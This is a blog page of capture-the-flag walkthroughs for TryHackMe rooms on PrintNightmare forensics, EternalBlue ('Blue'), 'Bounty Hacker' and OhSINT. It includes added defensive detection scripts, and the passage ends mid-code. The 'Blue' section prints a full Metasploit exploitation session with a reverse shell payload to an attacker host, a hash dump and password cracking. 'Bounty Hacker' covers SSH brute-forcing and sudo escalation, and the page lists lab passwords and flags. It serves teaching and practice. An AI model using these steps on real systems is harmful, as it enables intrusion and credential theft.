PrintNightmare, Again! CTF Walkthrough

Hackerween 2022 - Day 1

Armand Alvarez | Thursday, October 27, 2022


What is Hackerween?

Hackerween is a holiday challenge that has 5 rooms, one released each day from the 27th of October up until Halloween! These rooms will increase in difficulty, with the first two rooms being for beginners, then getting harder and harder. You can read more at this blog post.

The first Room - PrintNightmare, Again!

The first room can be found here.

The scenario describes an employee overhearing two co-workers discussing the PrintNightmare exploit and how they can use it to elevate their privileges on their local computers.

Our task is to inspect the artifacts on the endpoint and to detect the exploit they used.

We have a few more notes:

  • Note: Use the FullEventLogView tool. Go to Options > Advanced Options and set Show events from all times.

So, we know that this room deals with the PrintNightmare vulnerability, or CVE-2021-34527. You can read the Microsoft Security Response Center (MSRC) report on it here.

To summarize the write-up, an RCE vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. It can allow an attacker to run code with SYSTEM privileges. The security update for Windows Server 2012, Windows Server 2016, and Windows 10, version 1607 has been released.

We also see the notes: "In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (Note: These registry keys do not exist by default, and therefore are already at the secure setting.), also that your Group Policy settings are correct (see FAQ):

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint
NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)
UpdatePromptSettings = 0 (DWORD) or not defined (default setting)

Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design."

Once our machine has launched, we can click Show Split View at the top of the page to open a side window with the Windows machine.


Going through the tasks

The user downloaded a zip file. What was the zip file saved as?

We are greeted by a Desktop with two files on it: traffic.pcap (a PCAP, or packet capture, file) and Logfile.CSV, which we can presume to be some sort of log file.

Before we analyze, let's talk about the five tools we have on our Taskbar:

  • FullEventLogView: A tool that displays in a table the details of all events from the event logs of Windows

  • ProcDOT: Turns thousands of monitored activities into a big behavioral picture

  • Wireshark: Network protocol analyzer, this lets us view packet capture details

  • Brim: Network forensics and packet capture analyzer

  • PowerShell: CLI tool to interact with the computer (kind of like the Windows version of Terminal)

Our Hint says to try using ProcDOT or FullEventLogView.

We can dump our Logfile.CSV into the Procmon portion of the ProcDOT application, and our traffic capture into the Windump portion. We can use the plugin "Files List" to view a list of files from our logfile and PCAP. If we search for any file with .zip, we see that the user BMurphy had a file in their Downloads folder called "levelup.zip". ProcDOT also tells us that this file no longer exists.

The answer is levelup.zip

What is the full path to the exploit the user executed?

Now, let's look at the graph of how our user interacted with PowerShell. We already loaded our Procmon and Windump monitoring logs into ProcDOT; now select the powershell process under "Render Configuration" and click Refresh. This generates a graph of all the processes and threads that PowerShell created and how it interacted with different files. We see an interesting PS1 file, which is a PowerShell script. It is stored under a directory called CVE-2021-1675, which is related to the PrintNightmare vulnerability. If you put in the full path of this PowerShell script, you get the answer. This file was also deleted.

c:\users\bmurphy\Downloads\CVE-2021-1675-main\CVE-2021-1675.ps1

We could also find this PS1 file in our Files List plugin, using the same method as before.

What was the temp location the malicious DLL was saved to?

We are looking for a temp location, so we can go back to our Files List and search for any DLL by searching for the string ".dll". We see a temp location at c:\users\bmurphy\appdata\local\temp\3\nightmare.dll. This is the location.

What was the full location the DLL loads from?

We see another location that the nightmare.dll file used to be at: c:\windows\system32\spool\drivers\x64\3\new\nightmare.dll.

What is the primary registry path associated with this attack?

This part requires a lot of digging on our graph. When looking under the processes to view (by selecting the Render Configuration Launcher in ProcDOT), I saw backgroundTaskHost. This is a normal Windows EXE, but it seemed weird to me, so I selected that and refreshed my graph. I then saw that it was touching an Autostart registry key (registry path). This is really bizarre to me. Why would an EXE that is part of the Windows Cortana software be touching an Autostart location???

I started stepping through the events step by step. (You can do that with the controls on the bottom of the application.) We see that backgroundTaskHost.exe first kills its own process before setting the Autostart registry key. This kicks off spoolsv.exe, which then copies the temporary exploit location to a more permanent one, which we will call "New". Eventually it renames the file, taking out the "New", and it is just c:\Windows\System32\spool\drivers\x64\3\nightmare.dll.

Then, it creates the New file again, continues copying the temporary Nightmare.dll to it, then it queries and sets the PendingFileRenameOperations registry value, which can be used to automatically delete or move a file on reboot, with values of mxdwdrv.dll and nightmare.dll. We can guess the actor is probably trying to hide the nightmare.dll data in this system32/spool/driver location. They also create a new mxdwdrv.dll and rename it to the original one. Then it writes data to this mxdwdrv.dll. It finally sets the THMPrinter Configuration File & Data File to the nightmare.dll information, and the Driver to this new, fake mxdwdrv.dll file.

To summarize, it seems like it messed with Autostarts (super scary), hid this nightmare.dll in another, normal looking dll, then had the Printer data file load from this normal looking dll, which contained the malicious nightmare.dll code. Super scary stuff!

HKLM\System\CurrentControlSet\Control\Print\Environments\Windows x64\Drivers\Version-3\THMPrinter\Data File
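The ProcDOT stepping above is a manual hunt; the same sequence can be expressed as rules over a Procmon CSV export. The script below is an added example (not part of the walkthrough or the room's files) that flags the four behaviours described: a process writing a DLL into the spool driver store, a PendingFileRenameOperations change, an edit to a print-driver registry value, and a write to a Run autostart key. The CSV rows are constructed to mirror the narrative: spoolsv.exe with PID 2600 and the file and registry paths come from the write-up, while the PIDs for backgroundTaskHost.exe and explorer.exe and the "updater" Run value name are invented.

```python
import csv
import io
import re

# Constructed rows in Procmon's CSV export layout, modelled on the sequence
# reconstructed in ProcDOT. Not the room's Logfile.CSV: spoolsv.exe, PID 2600
# and the paths come from the write-up; the other PIDs and the "updater"
# Run value are invented for the example.
SAMPLE_CSV = r'''
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1000000","backgroundTaskHost.exe","4120","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\updater","SUCCESS","Type: REG_SZ"
"10:01:05.2000000","spoolsv.exe","2600","CreateFile","C:\Windows\System32\spool\drivers\x64\3\New\nightmare.dll","SUCCESS","Desired Access: Generic Write"
"10:01:05.3000000","spoolsv.exe","2600","WriteFile","C:\Windows\System32\spool\drivers\x64\3\New\nightmare.dll","SUCCESS","Offset: 0, Length: 8,192"
"10:01:06.0000000","spoolsv.exe","2600","RegSetValue","HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations","SUCCESS","Type: REG_MULTI_SZ"
"10:01:07.0000000","spoolsv.exe","2600","RegSetValue","HKLM\System\CurrentControlSet\Control\Print\Environments\Windows x64\Drivers\Version-3\THMPrinter\Data File","SUCCESS","Type: REG_SZ, Data: nightmare.dll"
"10:01:08.0000000","explorer.exe","1528","CreateFile","C:\Users\bmurphy\Documents\notes.txt","SUCCESS","Desired Access: Generic Read"
'''

SPOOL_DRIVER_DIR = re.compile(r"\\spool\\drivers\\", re.IGNORECASE)
AUTOSTART_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
PENDING_RENAME = re.compile(r"\\Session Manager\\PendingFileRenameOperations$", re.IGNORECASE)
PRINT_DRIVER_KEY = re.compile(
    r"\\Control\\Print\\Environments\\.*\\Drivers\\.*\\(Data File|Configuration File|Driver)$",
    re.IGNORECASE,
)


def is_write(row):
    """CreateFile counts as a write only when it asked for write access."""
    op = row["Operation"]
    return op == "WriteFile" or (op == "CreateFile" and "Write" in row["Detail"])


def triage(csv_text):
    """Return (rule, process, pid, path) tuples for rows matching a PrintNightmare-style pattern."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text.strip())):
        proc, op, path, pid = row["Process Name"], row["Operation"], row["Path"], int(row["PID"])
        if is_write(row) and path.lower().endswith(".dll") and SPOOL_DRIVER_DIR.search(path):
            findings.append(("driver_dll_write", proc, pid, path))
        elif op == "RegSetValue" and AUTOSTART_KEY.search(path):
            findings.append(("autostart_modified", proc, pid, path))
        elif op == "RegSetValue" and PENDING_RENAME.search(path):
            findings.append(("pending_file_rename", proc, pid, path))
        elif op == "RegSetValue" and PRINT_DRIVER_KEY.search(path):
            findings.append(("print_driver_changed", proc, pid, path))
    return findings


def loader_pids(findings):
    """Processes that dropped a DLL into the driver store, i.e. the ones that would load it."""
    return {(proc, pid) for rule, proc, pid, _ in findings if rule == "driver_dll_write"}


if __name__ == "__main__":
    results = triage(SAMPLE_CSV)
    for finding in results:
        print(*finding, sep="\t")
    print("DLL loaders:", loader_pids(results))
```

Against a real export the same rules run over many thousands of rows, so the process and PID from `loader_pids` give you the "who loaded the non-Microsoft-signed binary" answer without stepping the graph by hand; the Run-key rule is deliberately broad because any write there by a process that should not be managing autostarts deserves a look.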

What was the PID for the process that would have been blocked from loading a non-Microsoft-signed binary?

The process that has been loading the malicious files is spoolsv.exe, with a PID of 2600. So, ideally, it should have been blocked from loading this non-Microsoft-signed binary.

What is the username of the newly created local administrator account?

We can run the command "net user" to see the users on a machine. We can see the user backup which is a bit suspicious on a workstation.

What is the password for this user?

To do this, the hint tells us to use ProcDOT to find the PowerShell history file. We can go to the powershell.exe launcher in the Render Configuration and load the graph. From there, open the Files List and you can see the location of the PowerShell consolehost_history.txt file. After that, you can open PowerShell and run get-content <location of PowerShell history file> to see its contents. This gives you the username and password for the new user.

The password is ucGGDMyFHkqMRWwHtQ

What two commands did the user execute to cover their tracks? (no space after the comma)

In the same file we can see two commands that stick out for covering tracks: an rmdir command and a del command. These are the answers. Our actor removed the CVE directory and deleted the levelup.zip file.

rmdir .\CVE-2021-1675-main\,del .\levelup.zip


This was absolutely a difficult CTF, and if you didn't get it the first time, don't fret. I have done my fair share of CTFs on TryHackMe, and I struggled.... a lot. Read up on how to use ProcDOT; there are a lot of good articles out there. And if all else fails, just poke around a bit. You may find something you didn't expect.

*Notes: I could not get FullEventLogView to work. I gave it the full path for the .CSV log file and it wouldn't work. Kept giving me an error about the path being corrupted or something. If anybody has suggestions, please tweet me @_Armand_Alvarez. Happy Hacking!!

Blue


Armand Alvarez | Friday, 05 November 2021


Since I use tmux, and I use multiple sessions, I set the tmux env variable $IP to the IP address given to me by THM.

 └─$ tmux setenv IP 10.10.91.32

Nmap

# Nmap 7.91 scan initiated Fri Nov  5 22:39:26 2021 as: nmap -sCV -v -oN initial 10.10.91.32
Increasing send delay for 10.10.91.32 from 0 to 5 due to 255 out of 848 dropped probes since last increase.
Nmap scan report for 10.10.91.32
Host is up (0.11s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
| rdp-ntlm-info: 
|   Target_Name: JON-PC
|   NetBIOS_Domain_Name: JON-PC
|   NetBIOS_Computer_Name: JON-PC
|   DNS_Domain_Name: Jon-PC
|   DNS_Computer_Name: Jon-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2021-11-06T02:40:39+00:00
| ssl-cert: Subject: commonName=Jon-PC
| Issuer: commonName=Jon-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-11-05T02:12:25
| Not valid after:  2022-05-07T02:12:25
| MD5:   860d 0816 ffbb 1bde 790e f320 9a87 3abb
|_SHA-1: b33b 9c4e b514 c812 32b1 324c 397d 10e6 6c9b 3ad8
|_ssl-date: 2021-11-06T02:40:44+00:00; +1s from scanner time.
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
49159/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h00m00s, deviation: 2h14m09s, median: 0s
| nbstat: NetBIOS name: JON-PC, NetBIOS user: , NetBIOS MAC: 02:fd:9f:77:75:ad (unknown)
| Names:
|   JON-PC<00>           Flags: 
|   WORKGROUP<00>        Flags: 
|   JON-PC<20>           Flags: 
|   WORKGROUP<1e>        Flags: 
|   WORKGROUP<1d>        Flags: 
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: 
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-11-05T21:40:38-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-11-06T02:40:38
|_  start_date: 2021-11-06T02:12:24

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov  5 22:40:43 2021 -- 1 IP address (1 host up) scanned in 77.09 seconds

We can see from this that the machine has SMB running, with the OS reported as Windows 7 Service Pack 1. The SMBv1 server in this OS is vulnerable to EternalBlue, or CVE-2017-0144. This vulnerability was published in Microsoft security bulletin MS17-010.
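The conclusion above comes from reading three things off the scan by eye: port 445 open, the smb-os-discovery OS string, and the message-signing lines. As an added example (not part of this write-up's tooling), the script below parses nmap's normal output for exactly those facts and turns them into defender findings, which is how you would triage a fleet of such scans rather than one host. The embedded sample is a trimmed copy of the scan shown above; the policy and registry names in the findings are the standard Windows ones.

```python
import re

# Trimmed copy of the nmap -oN output from this write-up, embedded so the
# script runs offline.
SAMPLE_SCAN = """\
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
49152/tcp open  msrpc         Microsoft Windows RPC

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Builds that shipped SMBv1 and were in scope for the MS17-010 update.
LEGACY_WINDOWS = ("Windows XP", "Windows Server 2003", "Windows Vista",
                  "Windows Server 2008", "Windows 7")


def parse_nmap_normal(text):
    """Extract the port table and the SMB script facts from nmap -oN output."""
    ports, facts = [], {}
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                          "service": m.group(4), "version": m.group(5).strip()})
            continue
        # NSE script lines are prefixed with "| " or "|_"; strip that decoration.
        body = line.lstrip("|_ ").rstrip()
        if body.startswith("OS:"):
            facts["os"] = body[3:].strip()
        elif body.startswith("message_signing:"):
            facts["smb1_signing"] = body.split(":", 1)[1].strip()
        elif body.startswith("Message signing"):
            facts["smb2_signing"] = body
    return ports, facts


def assess_smb_exposure(ports, facts):
    """Turn the parsed scan into findings a defender would act on."""
    findings = []
    if not any(p["port"] == 445 and p["state"] == "open" for p in ports):
        return findings
    if any(tag in facts.get("os", "") for tag in LEGACY_WINDOWS):
        findings.append("SMB on a legacy Windows build: verify the MS17-010 update is installed and disable SMBv1")
    if facts.get("smb1_signing", "").startswith("disabled"):
        findings.append("SMB signing disabled: enable 'Microsoft network server: Digitally sign communications (always)'")
    if "not required" in facts.get("smb2_signing", ""):
        findings.append("SMB2 signing not enforced: set RequireSecuritySignature=1 under LanmanServer\\Parameters")
    return findings


if __name__ == "__main__":
    ports, facts = parse_nmap_normal(SAMPLE_SCAN)
    print("open ports:", [p["port"] for p in ports if p["state"] == "open"])
    print("os:", facts.get("os"))
    for finding in assess_smb_exposure(ports, facts):
        print("-", finding)
```

The OS string is the discriminating fact here: an open 445 alone is normal on a Windows network, but 445 on a build from the MS17-010 era with signing disabled is the combination that makes this box a target, and also the combination an asset inventory should surface before anyone else finds it.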

Metasploit

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Launch Metasploit on Linux with `msfconsole`. You can search for either the MS number (ms17-010) or the CVE number (2017-0144) and find similar results.
We can see the exploit path is exploit/windows/smb/ms17_010_eternalblue.

Options

msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                             /wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                             machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Wind
                                             ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server
                                              2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.240    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

The options show us a few required options. The only one not set is RHOSTS - which is the target host (see description.)

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.91.32
rhosts => 10.10.91.32

Set the payload to a reverse TCP shell.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp

Make sure, if you are running OpenVPN (THM usually requires it), that you set LHOST (the local host option) to your tun0 IP. You can find this by running `ifconfig`.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.6.77.21
LHOST => 10.6.77.21

It took me letting the exploit run a few times but I finally got in.

Upgrading from normal shell to meterpreter shell

I am using this writeup to convert the shell.

First, background the current (Normal Shell) session.

C:\Windows\system32>^Z
Background session 1? [y/N]  y
msf6 exploit(windows/smb/ms17_010_eternalblue) > 

Select the shell_to_meterpreter module

msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade

Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter

msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > 

Our options show that we must add the SESSION.

msf6 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to au
                                       to detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.

Set our session to 1 and run.

msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x64/windows               10.6.77.21:4444 -> 10.10.91.32:49233 (10.10.91.32)
  2         shell x64/windows               10.6.77.21:4444 -> 10.10.91.32:49234 (10.10.91.32)

msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1

Now that it has created a new meterpreter session, we can open it.

msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         shell x64/windows                                      10.6.77.21:4444 -> 10.10.91.32:49233 (10.10.91.3
                                                                   2)
  2         shell x64/windows                                      10.6.77.21:4444 -> 10.10.91.32:49234 (10.10.91.3
                                                                   2)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.6.77.21:4433 -> 10.10.91.32:49246 (10.10.91.3
                                                                   2)

msf6 post(multi/manage/shell_to_meterpreter) > session -i 3
[-] Unknown command: session
msf6 post(multi/manage/shell_to_meterpreter) > session -i 3
[-] Unknown command: session
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > 

Meterpreter

After I got the upgraded shell, I ran the command `shell` to open a DOS shell, then `whoami` to verify I was indeed NT AUTHORITY\SYSTEM. Then I ran the `ps` command to list all running processes, and `migrate` to a process running as NT AUTHORITY\SYSTEM.

Cracking the password

Dump all the hashes of the users on this machine. You can do this because you are on an elevated shell.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

I copied this hash into a file and used hashcat to crack it. This article shows how to do that.

└─$ hashcat -m 1000 --show hash /usr/share/wordlists/rockyou.txt
ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22

Finding the Flags

The first flag can be found at the root of the machine.

meterpreter > ls
Listing: C:\
============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   0      dir   2009-07-13 23:18:56 -0400  $Recycle.Bin
40777/rwxrwxrwx   0      dir   2009-07-14 01:08:56 -0400  Documents and Settings
40777/rwxrwxrwx   0      dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Program Files
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Program Files (x86)
40777/rwxrwxrwx   4096   dir   2009-07-13 23:20:08 -0400  ProgramData
40777/rwxrwxrwx   0      dir   2018-12-12 22:13:22 -0500  Recovery
40777/rwxrwxrwx   4096   dir   2018-12-12 18:01:17 -0500  System Volume Information
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Users
40777/rwxrwxrwx   16384  dir   2009-07-13 23:20:08 -0400  Windows
100666/rw-rw-rw-  24     fil   2018-12-12 22:47:39 -0500  flag1.txt
0000/---------    0      fif   1969-12-31 19:00:00 -0500  hiberfil.sys
0000/---------    0      fif   1969-12-31 19:00:00 -0500  pagefile.sys

meterpreter > cat flag1.txt
flag{access_the_machine}meterpreter > 

The second flag is in the C:\Windows\System32\config location. This is where passwords are stored.

I was having trouble finding the final flag. But I realized on meterpreter you can do search -f flag* to search for any files that begin with "flag". This showed me the location of the final flag. It is in Jon's documents.


That's all! Happy hacking 🙂

Bounty Hacker


TO SEE THE FULL WRITE-UP WITH IMAGES INCLUDED, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 16 August 2021

github.com/Armand-Alvarez

Room Link on TryHackMe


Find open ports on the machine

nmap

We can see we have the following ports open:

  • 21 - ftp

  • 22 - ssh

  • 80 - http


Who wrote the task list?

FTP

We can see from our nmap scan that FTP allows anonymous login, so let's explore that first.

ftp

After logging in, we begin in the root directory with nothing but two files. We can download these to our local machine using the wget command.

task.txt

Reading the file on our local machine shows that lin wrote it.


What service can you bruteforce with the text file found?

The other file we found is called locks.txt:

locks.txt

It looks like a file of possible passwords. We can try using this later.

Let's check out the website.

website homepage

The homepage has nothing important in it, and the page source doesn't contain anything hidden either.

Gobuster revealed a /images directory that only stores the picture we see on the home page. Nothing important there.

Nikto revealed a few things, but nothing relevant right now:

nikto

Given that the website has led to a dead end right now, the only other service that we can use the password file on is SSH.


What is the user's password?

Hint: Hydra may be able to help.

Let's use Hydra to try to figure out which password works with SSH. We can guess that lin is the username for SSH, given that it is the only name we have found so far.

hydra

We see our successful password is RedDr4gonSynd1cat3.

Testing it on SSH works.

ssh_lin
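A password-list run like the one above leaves a very recognisable trace on the target: a burst of "Failed password" lines from one source, then an "Accepted password" from the same source seconds later. As an added example (not part of the write-up), the script below implements that detection over sshd lines in syslog layout: it keeps a per-source sliding window of failures, raises one alert when the window crosses a threshold, and a second, higher-severity alert if a success follows while the window is still hot. The log lines, hostname and addresses are constructed for the example; the username lin is the one from the room.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in syslog layout (hostname and addresses invented).
# The first source hammers the account and then gets in; the second is a
# user who mistyped once and logged in five minutes later.
SAMPLE_AUTH_LOG = """\
Aug 16 14:02:01 target sshd[2101]: Failed password for invalid user admin from 10.0.2.15 port 51522 ssh2
Aug 16 14:02:01 target sshd[2102]: Failed password for lin from 10.0.2.15 port 51524 ssh2
Aug 16 14:02:02 target sshd[2103]: Failed password for lin from 10.0.2.15 port 51526 ssh2
Aug 16 14:02:02 target sshd[2104]: Failed password for lin from 10.0.2.15 port 51528 ssh2
Aug 16 14:02:03 target sshd[2105]: Failed password for lin from 10.0.2.15 port 51530 ssh2
Aug 16 14:02:04 target sshd[2106]: Accepted password for lin from 10.0.2.15 port 51532 ssh2
Aug 16 14:30:10 target sshd[2200]: Failed password for lin from 192.168.1.40 port 40010 ssh2
Aug 16 14:35:00 target sshd[2201]: Accepted password for lin from 192.168.1.40 port 40012 ssh2
"""

LINE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)


def detect_bruteforce(log_text, threshold=4, window_s=60):
    """Return (alert, source, user) tuples; one 'bruteforce' per burst, plus 'bruteforce_success'."""
    failures = defaultdict(list)  # source ip -> timestamps of recent failures
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%b %d %H:%M:%S")  # year-less syslog stamp
        outcome, user, src = m.group(2), m.group(3), m.group(4)
        # Drop failures that have aged out of the window before deciding.
        recent = [t for t in failures[src] if (ts - t).total_seconds() <= window_s]
        failures[src] = recent
        if outcome == "Failed":
            recent.append(ts)
            if len(recent) == threshold:  # fire once when the burst crosses the line
                alerts.append(("bruteforce", src, user))
        elif len(recent) >= threshold:  # success right after a burst: likely guessed
            alerts.append(("bruteforce_success", src, user))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(*alert, sep="\t")
```

The window matters more than the threshold: the second source in the sample also fails and then succeeds, but five minutes apart, so it never alerts. Tuning those two numbers against your own auth logs is the work; the pattern itself is the same one fail2ban keys on.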


user.txt

Once we get into the IP via SSH, we can cat the file.

user.txt

The flag for the user is: THM{CR1M3_SyNd1C4T3}


root.txt

Running sudo -l as lin gives us the following:

sudo -l

We can see that lin may run /bin/tar as root. This is great!

Getting on GTFOBins, we can search for "tar" and click SUDO (because we have sudo privileges for tar), and are given the following command:

tar sudo

Once we run this command on the SSH terminal, we gain root privileges. We can then read root.txt to find the flag: THM{80UN7Y_h4cK3r}

root


That's all! Happy hacking.

🙂

OhSINT


TO VIEW THIS WRITE-UP WITH ALL IMAGES INCLUDED, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 17 July 2021

Room link

Github Link


Task 1: OhSINT

First download the task file.

Inspecting the base image

Using the eog <image.png> command to view the image we just downloaded, all we see is the old Windows XP background image.

original image

On its own, this is nothing important, but what if we could dig deeper into the image?

What is this user's avatar of?

The very first question asks us what this user's avatar is of. Looking at the original photo we downloaded, I have no idea. Let's use a tool called ExifTool to look at some metadata.

According to the man page, "Exiftool is a command-line interface..., used for reading and writing meta information in a variety of file types." In other words, it is a steganography analysis tool.

Using this tool, we can see the metadata of the image and find who holds the copyright.

exiftool
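ExifTool hides what it is actually doing: for a PNG, the copyright string sits in a tEXt chunk that anyone can read with a few lines of code, and anyone publishing an image can strip. The script below is an added example (not part of the write-up or ExifTool) that builds a minimal PNG carrying a Copyright field, parses the chunk stream with CRC checks, extracts the text metadata, and produces a scrubbed copy. The image is constructed in code; only the value "OWoodflint" is taken from the write-up.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png(text_fields: dict) -> bytes:
    """Constructed 1x1 RGB PNG carrying the given tEXt fields (not the room's image)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
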